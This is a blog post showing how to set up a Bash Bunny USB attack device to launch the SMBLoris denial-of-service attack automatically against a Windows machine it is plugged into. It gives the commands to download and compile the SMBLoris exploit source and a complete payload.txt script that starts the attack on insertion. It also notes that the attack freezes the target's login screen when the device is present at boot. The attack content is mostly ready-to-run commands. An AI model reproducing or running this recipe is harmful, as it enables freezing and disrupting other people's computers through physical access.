Bashbunny and SMBLoris

I was watching Mr. Robot series recently and this idea came around to configure Bashbunny to automate the SMBLorris attack against Windows system. The whole concept is really simple and I will explain in the next steps what needs to be done.

You can check the initial article regarding Bashbunny and Metasploit here https://astr0baby.wordpress.com/2017/05/23/bashbunny-with-metasploit-ms17_010_eternalblue-vs-windows-7-sp1-x64/

So lets first prepare the Bashbunny device (make sure you can ssh to the device and set Internet connection sharing – setup is covered here) (( I have done all the setup on a Linux system))

Make sure to set some date for TLS/SSL to work ;)

# date -s "20170523"

Add this to /etc/apt/sources.list
 deb http://http.us.debian.org/debian/ jessie-updates main
 # apt-get update
 # apt-get -y install autoconf  build-essential

Now lets fetch the SMBLoris sources from https://gist.github.com/marcan and build the code on BashBunny

# mkdir /root/smb
# cd /root/smb 
# wget https://gist.githubusercontent.com/marcan/6a2d14b0e3eaa5de1795a763fb58641e/raw/565befecf4d9a4a27248d027a90b6e3e5994b5b6/smbloris.c
# gcc smbloris.c -o smbloris 

We are almost done, next we need to prepare the payload.txt on the Basbunny (Switch 1 or Switch 2)  to load the smbloris binary

#!/bin/bash
LED SETUP

# Enable Ethernet (RNDIS = Windows, ECM = mac/*nix)
#ATTACKMODE RNDIS_ETHERNET
#ATTACKMODE ECM_ETHERNET

ATTACKMODE RNDIS_ETHERNET 
#Set some current time ..... check your watch 
date -s "20170823" 
LED ATTACK 
/root/smb/smbloris usb0 1.1.1.1 255.255.255.254 172.16.64.64 
LED FINISH

Now arm your Bashbunny and set the switch to position where you have saved the paload.exe

We know the target IP will allways be 172.16.64.64 so this makes all too simple. All that is needed for this attach obviously is an open TCP port 445 on the Windows machine. I have switched off the firewall for the test’s sake.  Below is a short video of the automated attack.


The machine under attack will come back to life after some time. The laptop I was testing this against is a Thinkpad x100e with 2 GB RAM and it came back to life after about 3-10   minutes (I have unplugged the bash bunny immediately when the system froze) but the timing could be different depending on the stuff that is running on the machine. Also please bear in mind that via this attack you can fill in max 8 GB of RAM. Machines with more than that will be OK. However I have observed that if you leave the BashBunny in for a longer time (10 minutes) the system recovery takes way much longer ..

Obviously the same approach can be used against Linux/OSX with Samba running.

P.S. I have tried the metasploit module auxiliary/dos/smb/smb_loris.rb but it is not as powerful as Hector’s C code and does not freeze the host. (Possibly it is  due to the limitation of the Bashbunny’s 512 RAM and the ruby  requirements to load metasploit)

P.P.S What is interesting though, is that if you plug in the armed Bashbunny to the target machine that is switched off, once booted the attack will start; thus rendering the login almost impossible. The login screen will just appear frozen; until you disconnect the device. Even more interesting is the fact that after unplugging the device the machine stays frozen …

Advertisement

About astr0baby

Please run Adblock or similar... we have been told to do so since Carl Sagan wrote the Contact .
This entry was posted in Uncategorized. Bookmark the permalink.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.